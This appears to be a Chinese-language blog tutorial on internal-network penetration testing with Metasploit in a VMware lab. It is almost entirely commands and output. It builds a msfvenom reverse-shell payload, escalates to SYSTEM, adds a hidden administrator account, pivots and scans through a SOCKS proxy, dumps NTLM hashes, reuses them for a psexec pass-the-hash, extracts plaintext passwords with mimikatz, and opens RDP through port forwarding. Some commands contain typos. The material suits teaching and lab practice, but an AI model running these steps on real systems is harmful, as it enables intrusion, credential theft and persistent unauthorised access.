5.常见的内网渗透测试
内网渗透篇_常见的内网渗透测试
公网
22.22.22.22
内网的
192.168.0.1
在公司里面不是这样的
dmz隔离区
有台服务器 连接我的dmz
数据库 备份服务器 物理隔
生成攻击载荷
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105 lport=12345 -f exe >/var/www/html/s.exe
本地监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.196
set lport 12345
exploit
增加路由
run autoroute -s 10.10.10.0/24
查看路由别表
run autoroute -p
清空路由
run autorute -d
提权命令:
sysinfo 查看系统信息
查看路由表
route
ps进程
migrate 注入进程
1836 1820 explorer.exe
migrate 1836
getuid 当前用户
getprivs 尽可能提升权限#尽可能获取尽可能多的特权
getsystem 通过各种攻击向量来提升系统用户权限
meterpreter > getuid
Server username: WWW-6DA2DD109F0\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
shell 命令
增加管理员
net user moon$ moon123 /add & net localground administrators moon$ /add
检测存活IP
run post/multi/gather/ping_sweep RHOSTS=192.168.220.0/24
run post/windows/gather/arp_scanner RHOSTS=192.168.220.0/24
eterpreter > run post/multi/gather/ping_sweep RHOSTS=10.10.10.0/24
[*] Performing ping sweep for IP range 10.10.10.0/24
[+] 10.10.10.1 host found
[+] 10.10.10.133 host found
[+] 10.10.10.130 host found
meterpreter > run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24
[*] Running module against WWW-6DA2DD109F0
[*] ARP Scanning 10.10.10.0/24
[+] IP: 10.10.10.1 MAC 00:50:56:c0:00:02 (VMware, Inc.)
[+] IP: 10.10.10.133 MAC 00:0c:29:a9:46:ac (VMware, Inc.)
[+] IP: 10.10.10.131 MAC 00:0c:29:cb:a1:70 (VMware, Inc.)
[+] IP: 10.10.10.130 MAC 00:0c:29:27:b3:4a (VMware, Inc.)
[+] IP: 10.10.10.254 MAC 00:50:56:f3:19:f7 (VMware, Inc.)
socket代理 用namp 扫描内网的ip的服务
use auxiliary/server/socks4a
set SRVHOST 192.168.0.115
exploit
gedit /etc/proxychains.conf
扫描 10段的130到135的机子 假如有开放22,80 445 3306端口的 就把它显示出来 保存在10.10.10.0.txt
proxychains nmap -sT -Pn -p 445,22,80,3306 10.10.10.130-135 --open -oN 10.10.10.0.txt
background
查看sessions -i
root@kali:~# proxychains nmap -sT -Pn -p 445,22,80,3306 10.10.10.134 --open -oN 10.10.10.0.txt
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-31 16:10 CST
|S-chain|-<>-192.168.0.115:1080-<><>-10.10.10.134:22-<--denied
|S-chain|-<>-192.168.0.115:1080-<><>-10.10.10.134:445-<><>-OK
|S-chain|-<>-192.168.0.115:1080-<><>-10.10.10.134:3306-<><>-OK
|S-chain|-<>-192.168.0.115:1080-<><>-10.10.10.134:80-<><>-OK
Nmap scan report for 10.10.10.134
Host is up (0.78s latency).
Not shown: 1 closed port
PORT STATE SERVICE
80/tcp open http
445/tcp open microsoft-ds
3306/tcp open mysql
445开放 尝试hash攻击
hash获取 (kali2021 :hashdump
)
meterpreter > dumphash
[-] Unknown command: dumphash.
meterpreter > hashdump
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1006:384439c08fe914c385269bab29af3964:c35732f890930ace60f75b43c5fce5f8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WWW-6DA2DD109F0:1000:36da9815c5fd6064a46db2d4ededfaa2:a659d8140be35d693c8270fe84763529:::
IWAM_WWW-6DA2DD109F0:1001:703965fc8ad76fe786c7376481ac8155:36d9f3f998a3fd4f10e36f18bf3d3428:::
MYSQL_ZKEYS:1007:760a02892b914e738c91ea175b8d6cbc:1bdba7bf880370b6f117e912abbd054f:::
PhpMyAdmin_ZKEYS:1008:88ad4d59bbbac9b5c8c5fecdb31f4286:6e867d035fe07ea95ed151d320ea6b38:::
SUPPORT_388945a0:1004:aad3b435b51404eeaad3b435b51404ee:d39af09888207cd455a882d364de2c44:::
use exploit/windows/smb/psexec -->使用这个渗透攻击模块
set payload windows/meterpreter/bind_tcp
show options -->查看配置选项
set RHOST 192.168.2.107 -->设置攻击目标192.168.2.107,端口默认445(攻击那个隔离的目标)
set SMBUser Administrator -->设置账号为wing
set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
exploit -->执行攻击
(http://www.objectif-securite.ch/ophcrack.php)
hash 在线解密
meterpreter > hashdump
$darkmoon:1007:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1006:5985e076bb5b336a68e72c98631f9aff:017da1acf97bddd9c5e0738d83d228bd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WWW-B1EEB20D93D:1000:dda60bedc85fec8b974b70c87076e405:30752eaa18bfcef79b0d85bfe4154703:::
IWAM_WWW-B1EEB20D93D:1001:7dd2a148a6f23d466313eb40c0a94f66:690d92e838a54505a958e08f328f5268:::
SUPPORT_388945a0:1004:aad3b435b51404eeaad3b435b51404ee:dd1c6d0f2ca8a40e8b0de3852be70665:::
密码收集
load mimikatz
help mimikatz
imikatz自带的命令来从目标机器上导出hash和明文证书。
msv
kerberos
mimikatz_command -f samdump::hashes
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;1223686 NTLM WWW-B1EEB20D93D $darkmoon lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;1530585 NTLM WWW-B1EEB20D93D Administrator lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;192355 NTLM WWW-B1EEB20D93D Administrator lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;52757 NTLM n.s. (Credentials KO)
0;999 NTLM WORKGROUP WWW-B1EEB20D93D$ n.s. (Credentials KO)
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE
0;192355 NTLM WWW-B1EEB20D93D Administrator
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;52757 NTLM
0;999 NTLM WORKGROUP WWW-B1EEB20D93D$
0;1223686 NTLM WWW-B1EEB20D93D $darkmoon 123456
0;1530585 NTLM WWW-B1EEB20D93D Administrator 123456
meterpreter > crads_all
开启远程连接靶机3389
run getgui -e
增加帐号
run getgui -u hzx -p 123456
端口转发
portfwd add -l 5555 -p 3389 -r 192.168.220.128
rdesktop -u Administrator -p 123qwe 127.0.0.1:5555
用代理直接连接
proxychains rdesktop -u Administrator -p 123456 192.168.220.129
浙公网安备 33010602011771号